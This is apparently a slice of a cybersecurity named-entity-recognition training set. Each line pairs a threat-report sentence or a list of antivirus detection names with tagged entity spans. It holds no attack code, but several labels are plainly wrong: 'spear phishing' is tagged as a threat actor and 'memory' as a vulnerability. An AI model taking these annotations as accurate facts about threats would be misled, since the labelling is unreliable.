{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 HT_GM_GL290013.UVPM Trojan.Heur.Win32.10174 HT_GM_GL290013.UVPM BehavesLike.Win32.Trojan.vh Trojan.Heur.GM.D5FC4D76 Trojan/Win32.Buzus.R1005 Trojan.Win32.Tiggre", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001625", "source": "cyner2_train"}}
{"text": "We refer to these attacks as MuddyWater due to the confusion in attributing these attacks.", "spans": {"THREAT_ACTOR: MuddyWater": [[29, 39]]}, "info": {"id": "cyner2_train_001626", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Bot Packed.Win32.Klone.bn TrojWare.Win32.VB.oks Win32.Hack.Klone.bn.kcloud Backdoor:Win32/Blohi.B Packed/Win32.Klone Backdoor.Win32.Blohi W32/VB.QIK!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001627", "source": "cyner2_train"}}
{"text": "Unit 42 has collected multiple spear phishing emails, weaponized document files, and payloads all targeting various offices of the Mongolian government and deployed between August 2015 and February 2016.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: spear phishing": [[31, 45]], "ORGANIZATION: offices of the Mongolian government": [[116, 151]]}, "info": {"id": "cyner2_train_001628", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Miancha.r5 Trojan.PR.Preshin!uX45uZVdtBM Backdoor.Readomesa Backdoor.Win32.Miancha.f Trojan.Win32.Miancha.dfftbq Trojan.Starter.3690 Backdoor.Miancha.Win32.5 Backdoor/Miancha.c TR/Cudofows.A.1 W32/Miancha.F!tr.bdr Trojan[Backdoor]/Win32.Miancha Trojan.Inject.28 Trojan:Win32/Cudofows.A Backdoor.Miancha Trj/CI.A Backdoor.Win32.Miancha Proxy.BEPF Win32/Trojan.b2e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001629", "source": "cyner2_train"}}
{"text": "Recently, we came across an email exploit attempt, aimed at a European Point of Sales POS vendor.", "spans": {"MALWARE: email exploit": [[28, 41]], "SYSTEM: European Point of Sales POS vendor.": [[62, 97]]}, "info": {"id": "cyner2_train_001630", "source": "cyner2_train"}}
{"text": "The Bergard Trojan and the C0d0so group that made it famous with the November 2014 watering hole attack via Forbes.com have received renewed attention recently, with other researchers potentially linking emerging tools and recent attacks to the group.", "spans": {"MALWARE: The Bergard Trojan": [[0, 18]], "THREAT_ACTOR: the C0d0so group": [[23, 39]], "ORGANIZATION: researchers": [[172, 183]], "MALWARE: tools": [[213, 218]], "THREAT_ACTOR: the group.": [[241, 251]]}, "info": {"id": "cyner2_train_001631", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.Mist.111104 Troj.PSW32.W.Mist.a!c Win32.Trojan.WisdomEyes.16070401.9500.9977 Trojan-PSW.Win32.Mist.a Trojan.Win32.Mist.dboecq Trojan.DownLoad3.33938 Trojan-PSW.Win32.Mist W32.Malware.Heur PWS:Win32/Steam.J Trojan-PSW.Win32.Mist.a TrojanPSW.Mist Win32.Trojan-qqpass.Qqrob.Ajli Trojan.PWS.Mist! W32/Mist.A!tr.pws Win32/Trojan.PSW.db7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001632", "source": "cyner2_train"}}
{"text": "Recently, Palo Alto Networks Unit 42 reported on a new exploitation platform that we called DealersChoice in use by the Sofacy group AKA APT28, Fancy Bear, STRONTIUM, Pawn Storm, Sednit.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[10, 36]], "VULNERABILITY: exploitation platform that": [[55, 81]], "THREAT_ACTOR: DealersChoice": [[92, 105]], "THREAT_ACTOR: Sofacy group": [[120, 132]], "THREAT_ACTOR: APT28, Fancy Bear, STRONTIUM, Pawn Storm, Sednit.": [[137, 186]]}, "info": {"id": "cyner2_train_001633", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Collti Adware.ShandaAdd!DlXR6+5TT0o WS.Reputation.1 TR/Collti.A.24 Heuristic.BehavesLike.Win32.ModifiedUPX.C Trojan:Win32/Collti.A Trojan.Win32.Collti Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001634", "source": "cyner2_train"}}
{"text": "TrendMicro recently came across a variant of the BIFROSE malware that has been rewritten for UNIX and UNIX-like systems.", "spans": {"ORGANIZATION: TrendMicro": [[0, 10]], "MALWARE: BIFROSE malware": [[49, 64]], "SYSTEM: UNIX": [[93, 97]], "SYSTEM: UNIX-like systems.": [[102, 120]]}, "info": {"id": "cyner2_train_001637", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Banker/W32.Banbra.186368 Trojan/ProxyChanger.g Win32.Trojan.WisdomEyes.16070401.9500.9844 Trojan-Banker.Win32.Banbra.tnul Win32.Trojan-banker.Banbra.Wtxw Trojan-Downloader.Win32.Murlo W32/Trojan.IUVC-7922 TR/StealthProxy.B.11 Trojan[Downloader]/Win32.Banload Win32.Troj.Undef.kcloud Trojan-Banker.Win32.Banbra.tnul Trojan:Win32/StealthProxy.B Trojan/Win32.Scar.R17882 Trojan.ProxyChanger!31A84p0+A4o W32/ProxyChanger.NM!tr Trj/CI.A Win32/Trojan.Proxy.d23", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001639", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Aebot!O Backdoor.GTbot.Win32.124 Trojan/Aebot.k Win32.Backdoor.Aebot.f Win.Trojan.Sdbot-2505 Backdoor.Aebot Backdoor.Win32.GTbot.c Trojan.Win32.GTbot.craqxn TrojWare.Win32.Aebot.EF BackDoor.IRC.Sdbot.based BehavesLike.Win32.Ipamor.gz Backdoor/GTbot.bj Backdoor.Win32.GTbot.c Win32/Aebot.K Backdoor.Aebot!dwOGgEtXe1I Backdoor.Win32.Aebot.K W32/Aebot.K!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001641", "source": "cyner2_train"}}
{"text": "Derkziel info stealer Steam, Opera, Yandex, ...", "spans": {"MALWARE: Derkziel": [[0, 8]], "SYSTEM: Steam, Opera, Yandex,": [[22, 43]]}, "info": {"id": "cyner2_train_001642", "source": "cyner2_train"}}
{"text": "What are Google authorization tokens ? A Google authorization token is a way to access the Google account and the related services of a user .", "spans": {"ORGANIZATION: Google": [[9, 15], [41, 47], [91, 97]]}, "info": {"id": "cyner2_train_001643", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mdropper TROJ_ARTIEF.CR Exploit.MSWord.CVE-2010-3333.ci Exploit.Rtf.CVE-2010-3333.hzts Exploit.Rtf.based TROJ_ARTIEF.CR TrojanDropper.RTF.b NORMAL:Hack.Exploit.Script.CVE-2010-3333.a!1609827 Data/CVE20103333.A!exploit Luhe.Exploit.RTF.CVE-2010-3333.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001644", "source": "cyner2_train"}}
{"text": "In December 2015, several researchers reported that websites hosting the Rig Exploit Kit were serving an updated version of Qbot.3 4 5 Then in January 2016, over 500 devices at a large public organisation wereinfected with Qbot.", "spans": {"ORGANIZATION: researchers": [[26, 37]], "MALWARE: the Rig Exploit Kit": [[69, 88]], "MALWARE: Qbot.3 4 5": [[124, 134]], "SYSTEM: devices": [[166, 173]], "ORGANIZATION: large public organisation": [[179, 204]], "MALWARE: Qbot.": [[223, 228]]}, "info": {"id": "cyner2_train_001646", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SpamlesEI1.Trojan Rootkit.KillAv.B Trojan/W32.Rootkit.3712.K Trojan.Kapa.A Rootkit.W32.Small.to6t Trojan/AutoRun.AntiAV.r Rootkit.KillAv.B RTKT_SMALL.SMB Hacktool.Rootkit Win32/SillyAutorun.DCA RTKT_SMALL.SMB Rootkit.KillAv.B Rootkit.Win32.Small.sfn Rootkit.KillAv.B Trojan.Win32.NtRootKit.chvyyx Rootkit.KillAv.B TrojWare.Win32.Rootkit.Small.AA Trojan.NtRootKit.10455 Trojan:Winnt/Kapa.A Trojan:WinNT/Kapa.A Rootkit.Win32.Small.sfn Backdoor/Win32.Rootkit.R1193 Rootkit.KillAv.B Trojan.Win32.KillAV.af Worm.Orbina!Ypp8YqYGicY Trojan.WinNT.Kapa RootKit.Win32.KillAV.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001648", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 Trojanspy.Banker.16710 Win32/Tnega.EcVXcGD Trojan.Win32.Small.csf Troj.W32.Small.mfSA Trojan.Starter.3499 Trojan.Small.Win32.24377 Trojan/Small.paq TR/Rogue.30781 Trojan/Win32.Small Trojan:Win32/Meicater.A!bit Trojan.Strictor.D240AB Trojan.Win32.Small.csf Trojan.Small Trojan.Small!+nCz0Wnah68 Trojan.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001649", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Mahato!O Backdoor.Bifrose.F8 Trojan/Mahato.caj Win32.Trojan.WisdomEyes.16070401.9500.9964 TROJ_CALYPS.SMUJ Win.Trojan.Mahato-1 Trojan.Win32.Mahato.caj Trojan.Win32.Mahato.ijlmo Trojan.Win32.Scar.118272[UPX] TrojWare.Win32.Mahato.A BehavesLike.Win32.Sytro.cc Trojan/Mahato.ob W32.Backdoor.Apocalypse Trojan/Win32.Mahato Win32.Troj.Scar.15.kcloud Trojan.Zusy.DAAC W32.W.AutoRun.lkXC Trojan.Win32.Mahato.caj Trojan:Win32/Lypsacop.A Trojan/Win32.Mahato.R2854 Backdoor.Bifrose Virus.Win32.Delf Trojan.Mahato", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001650", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware10 Trojan.Mauvaise.SL1 TROJ_NITOL.SMD Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan2.PAML TROJ_NITOL.SMD Win32.Trojan-DDoS.Yoddos.A Trojan-Dropper.Win32.Dinwod.wkn Trojan.Win32.Staser.demkhd Troj.Dropper.W32.Dinwod.toj0 TrojWare.Win32.Nitol.KA DDoS.Attack.384 Trojan.Staser.Win32.2253 BehavesLike.Win32.Downloader.nm Trojan.Win32.Yoddos W32/Trojan.QEFN-2077 Trojan/Staser.le TR/Dropper.cgytn Trojan-Dropper.Win32.Dinwod.wkn Trojan:Win32/Wepiall.A Backdoor/Win32.Farfli.R119148 Trojan.Staser Trj/CI.A Win32/Yoddos.BW Trojan.Win32.Staser.anbya W32/Yoddos.BW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001651", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.1167 O97M.Downloader.4967 VB:Trojan.Valyria.1167 VB:Trojan.Valyria.1167 Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.Valyria.1167 VB:Trojan.Valyria.1167 HEUR.VBA.Trojan.e W97M.Downloader.GOX virus.office.qexvmc.1085", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001653", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Tsunami.A Linux.Backdoor.Kaiten ELF_KAITEN.SM HEUR:Backdoor.Linux.Tsunami.bh Trojan.Tsunami.exnldy Backdoor.Linux.Tsunami!c Linux.BackDoor.Tsunami.761 ELF_KAITEN.SM ELF/Backdoor.EWHJ- Backdoor.Linux.aego LINUX/Tsunami.bkdwv Trojan[Backdoor]/Linux.Tsunami.bh Trojan.Backdoor.Linux.Tsunami.1 HEUR:Backdoor.Linux.Tsunami.bh Backdoor.Linux.Tsunami.b Trojan.Linux.Tsunami ELF/Tsunami.NBV!tr Win32/Trojan.fba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001654", "source": "cyner2_train"}}
{"text": "Recently we detected a more sophisticated technique that a handful of countries across Asia are actively using to infect systems with RATs. This new technique ensures that the payload/file remains in memory through its execution, never touching the disk in a de-encrypted state.", "spans": {"SYSTEM: infect systems": [[114, 128]], "MALWARE: RATs.": [[134, 139]], "MALWARE: payload/file": [[176, 188]], "VULNERABILITY: memory": [[200, 206]]}, "info": {"id": "cyner2_train_001656", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Cossta!O Trojan.Cossta Trojan.Win32.Cossta.vjk Trojan.Win32.Drop.dxlfgu Trojan.Win32.Cossta.49152 Trojan.KillFiles.18641 Trojan/Cossta.ett Trojan/Win32.Cossta Worm:Win32/Vobirue.A W32.W.AutoRun.l6mI Trojan.Win32.Cossta.vjk HEUR/Fakon.mwf Win32/VB.OPD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001657", "source": "cyner2_train"}}
{"text": "With this latest report, we have now identified at least 21 cases in Mexico of abusive, improper targeting with NSO Group's Pegasus spyware", "spans": {"THREAT_ACTOR: NSO Group's": [[112, 123]], "MALWARE: Pegasus spyware": [[124, 139]]}, "info": {"id": "cyner2_train_001658", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FakeAlert.TK Rootkit.Win32.Clbd!O Trojan/Clbd.dt Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.FakeAlert.TK Trojan.FakeAlert.TK Trojan.Win32.Clbd.oyzd Trojan.Win32.Z.Clbd.68100 Trojan.FakeAlert.TK Trojan.FakeAlert.TK Rootkit.Clbd.Win32.6 BehavesLike.Win32.VirRansom.kc Trojan.Win32.Waledac Rootkit.Clbd.av Trojan.FakeAlert.TK TrojanDropper:Win32/Pasich.A Trojan/Win32.Bredlab.R17 Trojan.FakeAlert.TK MalwareScope.Worm.Nuwar-Glowa.1 Rootkit.Clbd!+/k5iv7h7q8 Win32/Trojan.df3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001660", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Veil.5 W32/Trojan.UYPJ-5875 Ruby/Rozena.H Trojan.Win32.Ruby.emhncx Trojan.SkypeSpam.11018 TR/AD.Rozena.uidpc Trojan.Win32.Z.Veil.654486.A Trojan.SkypeSpam! Trojan.Ruby.Rozena Win32/Trojan.34d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001661", "source": "cyner2_train"}}
{"text": "Apart from infecting systems with it, we also spotted instances where common lateral movement tools were detected around the same time they were actively compromising the endpoint with MajikPOS.", "spans": {"SYSTEM: infecting systems": [[11, 28]], "MALWARE: MajikPOS.": [[185, 194]]}, "info": {"id": "cyner2_train_001662", "source": "cyner2_train"}}
{"text": "The malicious code only makes for a small part of the app, making it difficult to detect.", "spans": {}, "info": {"id": "cyner2_train_001663", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.FakeInst.BD Android.Opfake.E Android.Trojan.FakeInst.BD AndroidOS/Opfake.AR ANDROIDOS_SMSUPDATE.C Andr.Trojan.Opfake-4 Android.Trojan.FakeInst.BD HEUR:Trojan-SMS.AndroidOS.Opfake.a A.H.Pay.ApuAte Trojan.Android.Opfake.emekxt Trojan:Android/Fakeinst.CG Android.SmsSend.2293 ANDROIDOS_SMSUPDATE.C AndroidOS/Opfake.AR Trojan/AndroidOS.r Trojan[SMS]/Android.Opfake Android.Troj.Opfake.b.kcloud Android.Trojan.FakeInst.BD HEUR:Trojan-SMS.AndroidOS.Opfake.a Android-Trojan/FakeInst.1b13 Trojan.AndroidOS.Opfake.A Trojan.Android.FakeInstall.p Trojan-SMS.AndroidOS.Opfake", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001665", "source": "cyner2_train"}}
{"text": "They only compromise specific high-value targets and once inside the company networks, move laterally to hosts that can be monetized.", "spans": {"SYSTEM: company networks,": [[69, 86]], "SYSTEM: hosts": [[105, 110]]}, "info": {"id": "cyner2_train_001666", "source": "cyner2_train"}}
{"text": "We've recently discussed Corebot malware and its possible ties to btcshop.cc, a site selling stolen data.", "spans": {"MALWARE: Corebot malware": [[25, 40]]}, "info": {"id": "cyner2_train_001669", "source": "cyner2_train"}}
{"text": "The Makop ransomware gang is still using the same tools used in their first operations in 2020, according to a recent investigation by Lifars security team, which has identified four of the gang's tools.", "spans": {"THREAT_ACTOR: The Makop ransomware gang": [[0, 25]], "MALWARE: tools": [[50, 55]], "THREAT_ACTOR: operations": [[76, 86]], "ORGANIZATION: Lifars security team,": [[135, 156]], "ORGANIZATION: the gang's": [[186, 196]], "MALWARE: tools.": [[197, 203]]}, "info": {"id": "cyner2_train_001671", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9531 Win.Trojan.AutoIT-6333854-0 AutoIt/injector.E AutoIt/injector.E Win32/Injector.Autoit.DFJ Trojan.Win32.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001676", "source": "cyner2_train"}}
{"text": "This file contained embedded macro code that executed a commonly observed PowerShell command to download and execute a file.", "spans": {"MALWARE: embedded macro code": [[20, 39]], "SYSTEM: PowerShell command": [[74, 92]]}, "info": {"id": "cyner2_train_001679", "source": "cyner2_train"}}
{"text": "MONSOON is the name given to the Forcepoint Security Labs", "spans": {"ORGANIZATION: MONSOON": [[0, 7]], "ORGANIZATION: the Forcepoint Security Labs": [[29, 57]]}, "info": {"id": "cyner2_train_001680", "source": "cyner2_train"}}
{"text": "Myanmar is a country currently engaged in an important political process.", "spans": {}, "info": {"id": "cyner2_train_001682", "source": "cyner2_train"}}
{"text": "The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware, including:", "spans": {"THREAT_ACTOR: The attackers": [[0, 13]], "THREAT_ACTOR: email campaigns": [[32, 47]], "MALWARE: FormBook malware,": [[131, 148]]}, "info": {"id": "cyner2_train_001684", "source": "cyner2_train"}}
{"text": "CryptoWall is a type of malware known as ransomware, which encrypts a victim's files and subsequently demands payment in exchange for the decryption key.", "spans": {"MALWARE: CryptoWall": [[0, 10]], "MALWARE: malware": [[24, 31]], "MALWARE: ransomware,": [[41, 52]]}, "info": {"id": "cyner2_train_001685", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.Win32.MS04-028!O Trojan.Diztakun W32.W.Ridnu.ls5O Trojan/Exploit.MS04-028.g Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/HideinPic.A Win.Trojan.Ag-1 Trojan.Win32.Diztakun.xnd Exploit.Win32.MS04028.lhyh Trojan.MulDrop3.32325 Exploit.MS04.Win32.105 BehavesLike.Win32.Vilsel.qc Trojan-Banker.Win32.Bancos Exploit.MS04-028.h Trojan[Exploit]/Win32.MS04-028 Trojan:Win32/Greener.A Trojan.Win32.Diztakun.xnd Trojan/Win32.Xema.C6210 Exploit.MS04028 Trojan.Heur.dmHfrf5Ccil Win32/Greener.A Win32.Virus.Greener.Pdct Worm.Kilada.A W32/Greener.A!tr Win32/Trojan.cae", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001686", "source": "cyner2_train"}}
{"text": "In fact, this concept is nothing novel – we already saw many ransomware families that can do the same.", "spans": {}, "info": {"id": "cyner2_train_001687", "source": "cyner2_train"}}
{"text": "This malware has the capability to overwrite a victim host's master boot record MBR and all data files.", "spans": {"MALWARE: malware": [[5, 12]]}, "info": {"id": "cyner2_train_001688", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Barys.DD90F Trojan:Win32/Rozena.D!bit Trojan.PowerShell.Rozena", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001689", "source": "cyner2_train"}}
{"text": "Pro PoS is simple-to-use PoS malware that is available for purchase, enabling multiple threat actors to easily take advantage of this malware to target businesses.", "spans": {"MALWARE: Pro PoS": [[0, 7]], "MALWARE: PoS malware": [[25, 36]], "THREAT_ACTOR: multiple threat actors": [[78, 100]], "MALWARE: malware": [[134, 141]], "ORGANIZATION: target businesses.": [[145, 163]]}, "info": {"id": "cyner2_train_001690", "source": "cyner2_train"}}
{"text": "For many years, one of the go-to families of malware used by both less-skilled and advanced actors has been the Poison Ivy aka PIVY RAT.", "spans": {"MALWARE: malware": [[45, 52]], "THREAT_ACTOR: less-skilled": [[66, 78]], "THREAT_ACTOR: advanced actors": [[83, 98]], "MALWARE: Poison Ivy": [[112, 122]], "MALWARE: PIVY RAT.": [[127, 136]]}, "info": {"id": "cyner2_train_001693", "source": "cyner2_train"}}
{"text": "Following discovery, we alerted our customers and began working with Microsoft through the responsible disclosure process.", "spans": {}, "info": {"id": "cyner2_train_001695", "source": "cyner2_train"}}
{"text": "On July 8, 2015, Unit 42 used the AutoFocus Threat Intelligence service to locate and investigate activity consistent with a spear-phishing attack targeting the US Government.", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "ORGANIZATION: AutoFocus Threat Intelligence service": [[34, 71]], "ORGANIZATION: US Government.": [[161, 175]]}, "info": {"id": "cyner2_train_001696", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Banker/W32.Alreay.639100 TrojanSpy.Banker.SW4 Trojan.Banswift Win.Trojan.BBSwift-4 Trojan-Banker.Win32.Alreay.b Trojan.Win32.Alreay.eigudw Win32.Trojan-banker.Alreay.Edxl Trojan.Swifter.1 Trojan.Banker.Alreay.f W32/Alreay.ADAQ!tr Troj.Banker.W32!c Trojan-Banker.Win32.Alreay.b Trojan:Win32/Tokser.A Trojan/Win32.Alreay.C1768016 Spyware.Banker.Alreay TrojanBanker.Alreay Win32/Spy.Banker.ADAQ Trj/GdSda.A Win32/Trojan.c8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001697", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Infostealer.Gampass Trojan.DownLoad1.59715 Trojan-Downloader.Win32.Adload!IK Trojan/Win32.Adload Trojan-Spy.Win32.Filka.ld Trojan-PSW.Gampass Trojan-Downloader.Win32.Adload Trj/Lineage.BZE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001698", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Clicker.BHO.ncs Win32.Trojan.WisdomEyes.16070401.9500.9639 Win32/TrojanClicker.BHO.NCS Win32.Trojan.Spnr.Pfjg TrojWare.Win32.TrojanClicker.BHO.NCS Dropper.BHO.Win32.500 TrojanDropper.BHO.pj TR/Rogue.kdv.655157 Trojan[Dropper]/Win32.BHO Trojan.Zusy.Elzob.D1C26 TrojanDropper:Win32/Hufysk.A Dropper/Win32.BHO.R25331 TrojanDropper.BHO Trojan-Dropper.Win32.Hufysk W32/TrojanClicker_BHO.NCS Trj/CI.A Win32/Trojan.a73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001701", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Msil.H Trojan-Downloader.Win32.FraudLoad!O Win32/SillyDl.YBL Win.Downloader.134626-1 Trojan.Downloader.Msil.H Trojan-Downloader.Win32.FraudLoad.iei Trojan.Downloader.Msil.H Trojan.Win32.A.Downloader.229376.FL Trojan.Downloader.Msil.H Win32.HLLW.Myscan.1 BehavesLike.Win32.BadFile.pm Trojan[Downloader]/Win32.FraudLoad TrojanDownloader:Win32/Hesto.A Trojan-Downloader.Win32.FraudLoad.iei Trojan.Downloader.Msil.H TrojanDownloader.FraudLoad Trojan.Downloader.Msil.H", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001703", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.TDSS!O Win32.Trojan.WisdomEyes.16070401.9500.9885 Trojan.Win32.Drop.dajhso Trojan.MulDrop5.32960 Trojan/PSW.LdPinch.adoe Backdoor:Win32/Nosrawec.A Trojan.Delf.279 Backdoor.W32.Beastdoor.l7a6 Trojan/Win32.Nosrawec.R198886 RiskWare.Tool.CK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001704", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SasfisQKC.Fam.Trojan Trojan/W32.PornoBlocker.60928.F TrojanDropper.Bamital.I3 Trojan/PornoBlocker.hhu TROJ_BAMITAL.SM2 Win32.Trojan.Kryptik.ct TROJ_BAMITAL.SM2 Win.Trojan.Ransom-740 Trojan-Ransom.Win32.PornoBlocker.hts Trojan.Win32.PornoBlocker.bwvwe Trojan.Hottrend Trojan.PornoBlocker.Win32.1248 Trojan/PornoBlocker.axt TR/Qhost.60928 Trojan[Ransom]/Win32.PornoBlocker Trojan.VIZ.1 Trojan:Win32/Bamital.I Trojan.SB.01742 Bck/Qbot.AO Win32/Bamital.FA Win32.Trojan.Pornoblocker.Lkxy Trojan.PornoBlocker!v14Do0CXdgA Win32/Trojan.3c3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001705", "source": "cyner2_train"}}
{"text": "ATM malware is not new, back in 2013 and 2014 threats like Ploutus or PadPin Tyupkin were used to empty ATMs in Mexico, Russia and other countries, but SUCEFUL offers a new twist by targeting the cardholders.", "spans": {"MALWARE: ATM malware": [[0, 11]], "MALWARE: Ploutus": [[59, 66]], "MALWARE: PadPin Tyupkin": [[70, 84]], "SYSTEM: ATMs": [[104, 108]], "ORGANIZATION: cardholders.": [[196, 208]]}, "info": {"id": "cyner2_train_001707", "source": "cyner2_train"}}
{"text": "As an active threat under development, we decided to take a closer look at this RAT to understand some of its inner workings and capabilities.", "spans": {"MALWARE: active threat": [[6, 19]], "MALWARE: RAT": [[80, 83]]}, "info": {"id": "cyner2_train_001709", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9980 Trojan.Win32.Zusy.rjrdd TrojWare.Win32.TrojanDownloader.Murlo.~JH2 Trojan.Sasfis.Win32.30609 Trojan/Sasfis.xqr TR/Zusy.3171.28 Trojan/Win32.Sasfis Trojan.Zusy.DC63 Backdoor:Win32/Usinec.A Trojan/Win32.Sasfis.C97816 Trojan.Sasfis Trojan.Sasfis!LKZhl2Eyglg Trojan.Win32.Sasfis", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001710", "source": "cyner2_train"}}
{"text": "Although state-sponsored attacks against the United States by Chinese threat actors have decreased dramatically since the signing of the US-China Cyber Agreement in 2016, Proofpoint researchers have continued to observe advanced persistent threat APT activity associated with Chinese actors targeting other regions.", "spans": {"THREAT_ACTOR: Chinese threat actors": [[62, 83]], "ORGANIZATION: US-China Cyber Agreement in": [[137, 164]], "ORGANIZATION: Proofpoint researchers": [[171, 193]], "THREAT_ACTOR: advanced persistent threat APT": [[220, 250]], "THREAT_ACTOR: Chinese actors": [[276, 290]]}, "info": {"id": "cyner2_train_001711", "source": "cyner2_train"}}
{"text": "Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, such as the use of an iOS espionage app, and the inclusion of new targets like the White House.", "spans": {"MALWARE: campaign,": [[88, 97]], "MALWARE: iOS espionage app,": [[120, 138]], "ORGANIZATION: the White House.": [[177, 193]]}, "info": {"id": "cyner2_train_001714", "source": "cyner2_train"}}
{"text": "Cknife is a Chinese cross-platform compatible Java web shell framework — that operates more like a RAT for web servers — based on China Chopper.", "spans": {"MALWARE: Cknife": [[0, 6]], "MALWARE: Chinese cross-platform compatible Java web shell framework": [[12, 70]], "MALWARE: RAT": [[99, 102]], "SYSTEM: web servers": [[107, 118]], "MALWARE: China Chopper.": [[130, 144]]}, "info": {"id": "cyner2_train_001715", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Menti.184320.T Trojan.Graftor.D557F Win32.Trojan.Farfli.ai Trojan.DownLoader6.3217 BehavesLike.Win32.BadFile.cm Trojan.Win32.MMM Trojan/Win32.Menti PWS:Win32/Quopax.A!dll Trojan.Win32.A.Menti.184320.YN BScope.Trojan.SvcHorse.01643 Backdoor.Win32.Gh0st.EB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001716", "source": "cyner2_train"}}
{"text": "For the entry point, this Locky variant uses spam emails with .ZIP file attachments that contain WSF files.", "spans": {"MALWARE: Locky variant": [[26, 39]]}, "info": {"id": "cyner2_train_001717", "source": "cyner2_train"}}
{"text": "In late August, WildFire Locker disappeared after the organizations behind NoMoreRansom.org were able to seize control of the ransomware s Command Control servers.", "spans": {"MALWARE: WildFire Locker": [[16, 31]], "ORGANIZATION: organizations": [[54, 67]], "MALWARE: ransomware": [[126, 136]]}, "info": {"id": "cyner2_train_001718", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanspy.Smetsb.FC.4036 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.MSIL.Krypt.4 Trojan/Win32.ZBot.R155926 Trojan.InfoStealer.KL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001719", "source": "cyner2_train"}}
{"text": "This version masquerades as CryptoWall.", "spans": {"MALWARE: CryptoWall.": [[28, 39]]}, "info": {"id": "cyner2_train_001720", "source": "cyner2_train"}}
